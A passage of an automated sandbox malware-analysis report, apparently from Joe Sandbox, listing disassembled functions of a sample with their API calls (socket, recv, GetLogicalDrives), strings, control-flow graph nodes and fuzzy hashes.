                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: recv
                                                        • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                        • API String ID: 1507349165-640788491
                                                        • Opcode ID: d3abacb5cc9b4008f87a22f84e3caff0a6f0ee02f6d944e0ae5946802a86da4a
                                                        • Instruction ID: d57780824c6686059cdbec8c5fec1473337f87a660b742fe36f77a21543b7726
                                                        • Opcode Fuzzy Hash: d3abacb5cc9b4008f87a22f84e3caff0a6f0ee02f6d944e0ae5946802a86da4a
                                                        • Instruction Fuzzy Hash: 1F1138B1A043047BD1209A14BC4AF2B3B9CDBC6B2DF44096DBC0953343D6689C0482B6
                                                        Function 004575E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1694 4575e0-4575ed 1695 457607-457629 socket 1694->1695 1696 4575ef-4575f6 1694->1696 1698 45763f-457642 1695->1698 1699 45762b-45763c call 4572a0 1695->1699 1696->1695 1697 4575f8-4575ff 1696->1697 1700 457601-457602 1697->1700 1701 457643-457699 call 4572a0 call 45cb20 call 7d8c50 1697->1701 1699->1698 1700->1695
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: socket
                                                        • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                        • API String ID: 98920635-842387772
                                                        • Opcode ID: 5f1c55fd49a8fe027c07a0fb5bbd83a71b3ff5bbdd6ed49513101bef023aeb3f
                                                        • Instruction ID: a64ac47e95ce69f9a685edc331cbad9fcd95d4b1738a7556d85b2b866189f96f
                                                        • Opcode Fuzzy Hash: 5f1c55fd49a8fe027c07a0fb5bbd83a71b3ff5bbdd6ed49513101bef023aeb3f
                                                        • Instruction Fuzzy Hash: 60112976A102113BD6205629BC56F8B3B99DBC1B39F440929F814932D3D7198D58C2E7
                                                        Function 071B000B Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 476COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1712 71b000b-71b0012 1713 71b0019-71b0020 1712->1713 1714 71b0014-71b0016 1712->1714 1715 71b0026-71b0460 call 71b0193 call 71b044e GetLogicalDrives 1713->1715 1714->1715 1768 71b046b-71b06dc call 71b05f1 1715->1768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 41ee81ede04aa40e0ae25bd0b24955a05adedaa18c1b61653c0dbcc75c6cb297
                                                        • Instruction ID: 979e007bf5840a0a8bfc49d9b6dd3701446a8831b2010f09850a3f48d178f895
                                                        • Opcode Fuzzy Hash: 41ee81ede04aa40e0ae25bd0b24955a05adedaa18c1b61653c0dbcc75c6cb297
                                                        • Instruction Fuzzy Hash: 6A91A3EB26C111BD712A85422F64AFB676DE1CF770B32846BF807D6582E3994F8D5032
                                                        Function 071B006C Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 474COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1797 71b006c-71b006f 1798 71b0071-71b0072 1797->1798 1799 71b0034-71b0067 1797->1799 1800 71b0032 1798->1800 1801 71b0074-71b0076 1798->1801 1804 71b0077-71b0460 call 71b0193 call 71b044e GetLogicalDrives 1799->1804 1800->1799 1801->1804 1854 71b046b-71b06dc call 71b05f1 1804->1854
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 36210419e3f2fec48cde6f8aac8c9aa01c55ce820980fb738adc5c773647e1d7
                                                        • Instruction ID: 9619d1438623c46c4d395b804df9b101c5a44c9e3a304f4b3fc58c05865374e6
                                                        • Opcode Fuzzy Hash: 36210419e3f2fec48cde6f8aac8c9aa01c55ce820980fb738adc5c773647e1d7
                                                        • Instruction Fuzzy Hash: D091B5EB26C111BD712A85422F649FB576DE1CF770B32842BF807D5582E3944E8D5032
                                                        Function 071B0000 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 469COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 8720e364afd9117849ca7cb9031f61e26b6467b0163750074b83846a0c9c067e
                                                        • Instruction ID: 60c951cc5cd1a975b81af3cd9b841ec34d832d6dccee3612dbb28704f8fd7306
                                                        • Opcode Fuzzy Hash: 8720e364afd9117849ca7cb9031f61e26b6467b0163750074b83846a0c9c067e
                                                        • Instruction Fuzzy Hash: DA9172EB26C111BD712A85422F64AFB676DE1CF770B33846BF807D6582E3994E8D5032
                                                        Function 071B002E Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 462COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 273b3843272ee4189ba7a6eb8faf0bc175a6a9eb3225ae340fce51b41f38a78d
                                                        • Instruction ID: ac82473ee78caa713aa559c2a32fec3fda01b6c99c476db7341489e653bd346b
                                                        • Opcode Fuzzy Hash: 273b3843272ee4189ba7a6eb8faf0bc175a6a9eb3225ae340fce51b41f38a78d
                                                        • Instruction Fuzzy Hash: 939171EB26C111BD712A85422F64AFB676DE1CF770B32846BF807D6582E3994E8D5032
                                                        Function 071B003F Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 459COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: c84f4db07a689a16df8db9506037252a53ca0e868e34294868b4500427f4d182
                                                        • Instruction ID: 7938c028a6a001bdd938bb343cf56570726a030e526cdb7ee812d02a9c6ea9b8
                                                        • Opcode Fuzzy Hash: c84f4db07a689a16df8db9506037252a53ca0e868e34294868b4500427f4d182
                                                        • Instruction Fuzzy Hash: 5A9182EB26C111BD712A85422F64AFB676DE1CF770B32842BF807D6582E3994E8D5032
                                                        Function 071B00BC Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 401COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 54647cf5fc265773dff34eb03f4b5ccd43a764bb93adb793e279fdaf06dfeeaa
                                                        • Instruction ID: 82c4a9f3c98d61c5e6670cb8de7715f4f85445bfcbf8a9f2124bd7792949c29a
                                                        • Opcode Fuzzy Hash: 54647cf5fc265773dff34eb03f4b5ccd43a764bb93adb793e279fdaf06dfeeaa
                                                        • Instruction Fuzzy Hash: 3181E5EB22C211BD712A84522BA49FB676DE5CF730B33846BF807D56C2E3944B8D5132
                                                        Function 071B016D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 385COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 0067becf4b320206fc506d8d70dbafb25cdbb0ec775e01183da1571ce927acb5
                                                        • Instruction ID: 72c035a7fdddd084443fb6d942ea2e18ea7ffe6eb4abb510693ea3e217ad9db8
                                                        • Opcode Fuzzy Hash: 0067becf4b320206fc506d8d70dbafb25cdbb0ec775e01183da1571ce927acb5
                                                        • Instruction Fuzzy Hash: C071E9FB26C111BD712A85522BA4AFB576DE5CF730B33846BF807D5581E3984E8D5032
                                                        Function 071B0109 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 384COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 08fdbe47bb22af6e2c4e27e9e4716ccac302bd5ef334ceeb2c97e0244e8db388
                                                        • Instruction ID: bf56f8edecf6c98709a2c69179aaa051a5d822ccfd0db03d8e8bf9ee306a7c82
                                                        • Opcode Fuzzy Hash: 08fdbe47bb22af6e2c4e27e9e4716ccac302bd5ef334ceeb2c97e0244e8db388
                                                        • Instruction Fuzzy Hash: 9F71C6EB22C111BD712A81522FA5AFB576DE5CF730B33856BF807D56C2E3984A8D5032
                                                        Function 071B012C Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 375COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 0c03448e97c673d81c281e91f16b006e269aaa122efdd623e4bd28860dfc945e
                                                        • Instruction ID: e9204d110899c7427f762d8fa21ccddd79c1458f9f1c4ea99b661de98f882516
                                                        • Opcode Fuzzy Hash: 0c03448e97c673d81c281e91f16b006e269aaa122efdd623e4bd28860dfc945e
                                                        • Instruction Fuzzy Hash: 1E71B5FB22C111BD712A85422BA49FB676DE5CF730B32846BF807D5581E3984A8D5132
                                                        Function 071B011D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 374COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: f64a1d11c3a679ab69b901edd5f8264a06b20baff4fdd815749e7b9d98d0e13a
                                                        • Instruction ID: 39c4ff281380af1c120acd3dc5f834cb716e0d635f174611c155267ba2a76e0d
                                                        • Opcode Fuzzy Hash: f64a1d11c3a679ab69b901edd5f8264a06b20baff4fdd815749e7b9d98d0e13a
                                                        • Instruction Fuzzy Hash: A271C7FB22C111BD712A85422BA4AFB576DE5CF730B33846BF807D5581E3984B8D5032
                                                        Function 071B0143 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 371COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: b739106a2bdd544eef3bcd530e01577086ba84070c6baa23bcb5195703cdeacd
                                                        • Instruction ID: fa6901e15383394148346a06f490fc544c73c0cb54717b8f3ce610e64361b773
                                                        • Opcode Fuzzy Hash: b739106a2bdd544eef3bcd530e01577086ba84070c6baa23bcb5195703cdeacd
                                                        • Instruction Fuzzy Hash: C271E8FB22C111BD722A85422BA49FB576DE5CF730B33846BF407C5681E3944B8D5132
                                                        Function 071B019F Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 369COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 3b33d07394e79e4c7d6f5aa1f9d5e9d52258b020f85f43b1f5cd6282b65e3237
                                                        • Instruction ID: d293ab4836298d81c5366cdf860eb64cee6123c9f8fcda63b8d4ba36039ebbb8
                                                        • Opcode Fuzzy Hash: 3b33d07394e79e4c7d6f5aa1f9d5e9d52258b020f85f43b1f5cd6282b65e3237
                                                        • Instruction Fuzzy Hash: 0B711AEB12C111BD712A85512BA49FB6B6DE5CF730B33846BF407D5681E3984E8D5032
                                                        Function 071B01B8 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 340COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: abc04cbf2ca92eb0ae69f5c9e0dbf5eeddcc76f3b077b168a767b331bcac3f88
                                                        • Instruction ID: 7d2824fd1e4188f018f68184e34b5d6c092b17f1db082fe5203bafe64111d9e7
                                                        • Opcode Fuzzy Hash: abc04cbf2ca92eb0ae69f5c9e0dbf5eeddcc76f3b077b168a767b331bcac3f88
                                                        • Instruction Fuzzy Hash: BC6108FB12C111BD722A84522B949FB676DE5CF730B33847BF407C6A82E3944A8D5132
                                                        Function 071B0193 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 337COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 268afe00af9192b559bca0c711ceb978acaf411fae1961122147f6dfe06d201d
                                                        • Instruction ID: d35368481815e87bbe33f352fbc3618c27195ddcf1ff3a822300e0eda025f393
                                                        • Opcode Fuzzy Hash: 268afe00af9192b559bca0c711ceb978acaf411fae1961122147f6dfe06d201d
                                                        • Instruction Fuzzy Hash: AB61D5EB12C111BD722A85522BA49FB576DE5CF730B33846BF807D1A82E3984F8D5132
                                                        Function 071B0225 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 9000d83bb91b0cdfd2f53cd8abc3f8237c10056f325cae4e458274c8a85ef320
                                                        • Instruction ID: fa5652162b3f899c85c0b62834cc0f9d2a012bdcb65e667c57267db25ec9b504
                                                        • Opcode Fuzzy Hash: 9000d83bb91b0cdfd2f53cd8abc3f8237c10056f325cae4e458274c8a85ef320
                                                        • Instruction Fuzzy Hash: ED51C6FB12C211BE722A85512B649FB676DE5CF730B33856BF407D1682E3944A8D5132
                                                        Function 071B0213 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 314COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: b1ee182ae5bbfd6a290c2619dd57f64794b5a910a717406961f9a115151fd212
                                                        • Instruction ID: e4c6f6d7375a4bc3782b92f52894c2909cde8c04377b97778ba75b95f2a1548a
                                                        • Opcode Fuzzy Hash: b1ee182ae5bbfd6a290c2619dd57f64794b5a910a717406961f9a115151fd212
                                                        • Instruction Fuzzy Hash: 0151F7FB12C111BD722A85522BA49FB576DE5CF730B338567F807D1A82E3984B8D5132
                                                        Function 071B0284 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 41999a05e368ea38a2490a9c6a20dba837377a16caebd43137339e8517f02fc4
                                                        • Instruction ID: bfb4b57bd328e6cb7ef5780f2b7212c39e247aae4bb4a19af23d9856e2baa4d5
                                                        • Opcode Fuzzy Hash: 41999a05e368ea38a2490a9c6a20dba837377a16caebd43137339e8517f02fc4
                                                        • Instruction Fuzzy Hash: 4851D7FB12C111BD722A85522B54AFB576DE5CF730B338467F407D5A82E3984B8D5132
                                                        Function 071B0267 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 308COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: ea7923ab8f248120765cc481989a227f8e55dc404584d2fe5488566db272b79a
                                                        • Instruction ID: 595aa064ff86f24d949784dca440694f652fe8fdcd2cdc7603906e37a10138e5
                                                        • Opcode Fuzzy Hash: ea7923ab8f248120765cc481989a227f8e55dc404584d2fe5488566db272b79a
                                                        • Instruction Fuzzy Hash: F851D9FB12C211BE722A85512BA49FB676DE5CF730B32857BF407D5982D3980B8D5132
                                                        Function 071B0250 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 305COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 01fc43db7e159df73840f5a5d4596791dfd3f263dcadaeeb5b0b18daa35b85e4
                                                        • Instruction ID: 38f17b7b4dd926382fde5c3913d1212faa1f6b888b15e411f0f1361a74b7fb21
                                                        • Opcode Fuzzy Hash: 01fc43db7e159df73840f5a5d4596791dfd3f263dcadaeeb5b0b18daa35b85e4
                                                        • Instruction Fuzzy Hash: 0A51D5FB22C211BD722A80562B649FB5B6DE5CF730B328577F803D5982E3984B8D5032
                                                        Function 071B029E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 296COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 2852aaa4b03531484b77905202d363e246a71d7a34f0a7bafa26c1ea7b647f41
                                                        • Instruction ID: c332493957975738b286008a31fe3e7882f71c6898c684b978099742be178b2c
                                                        • Opcode Fuzzy Hash: 2852aaa4b03531484b77905202d363e246a71d7a34f0a7bafa26c1ea7b647f41
                                                        • Instruction Fuzzy Hash: 3C51D5FB22C211BD722A84522B649FB576DE5CF730B338977F803D1581E3984A8D5032
                                                        Function 071B0303 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 256COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 707d2366ddd3dbbdac6170ec2a3146b3dfb832b5dc84415d33dda73b3eb84fb9
                                                        • Instruction ID: dd61ab712085a3227d35ae526ccbbf1744de2b0f04dd6c4ac25a4fb997820eec
                                                        • Opcode Fuzzy Hash: 707d2366ddd3dbbdac6170ec2a3146b3dfb832b5dc84415d33dda73b3eb84fb9
                                                        • Instruction Fuzzy Hash: EA51F8FB22C211BE722A85512B649FB576DE5CF730B338577F403D5981D3984A8D5032
                                                        Function 071B032A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 256COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: c52530c2aa6b1f5a65dc04b1614b2464762faa4d44ab0107a1960cc0525f2c57
                                                        • Instruction ID: c0cb866994a20a7b40755e454513c6a9cdac5383cd2e4983501ff490c12abb01
                                                        • Opcode Fuzzy Hash: c52530c2aa6b1f5a65dc04b1614b2464762faa4d44ab0107a1960cc0525f2c57
                                                        • Instruction Fuzzy Hash: 2A51D5FB22C211BE722A85512B649FB676DE5CF730B338567F403C5981E3984A8D5032
                                                        Function 071B0359 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 071B0456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 8b4ee3477d59c3a9009736a0944b34bed7fd10a4d92fe3fb2198fce268115da4
                                                        • Instruction ID: 79edd08d100e084425456acb55a81072e618295098cbc2016f81cee7d9252138
                                                        • Opcode Fuzzy Hash: 8b4ee3477d59c3a9009736a0944b34bed7fd10a4d92fe3fb2198fce268115da4
                                                        • Instruction Fuzzy Hash: 1F51E6F722C111BEB22A85512B649FB576DE5CF730B328567F403D1982D7984A8D5132
                                                        Function 071B034A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 5d98ff3c5ad6d886d7bd9d9ff413852fbf3a7c19509c6d0f0256154295e791a6
                                                        • Instruction ID: fee41b01fa18e50f9c146a9a4580fa3e2487addac30334a733f06cb8ad0eb39b
                                                        • Opcode Fuzzy Hash: 5d98ff3c5ad6d886d7bd9d9ff413852fbf3a7c19509c6d0f0256154295e791a6
                                                        • Instruction Fuzzy Hash: 1641D5FB22C111BE722A81522B649FB576DE5CF730B338567F803D1981E3984A8D5032
                                                        Function 0048A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • getsockname.WS2_32(?,?,00000080), ref: 0048A1C6
                                                        Strings
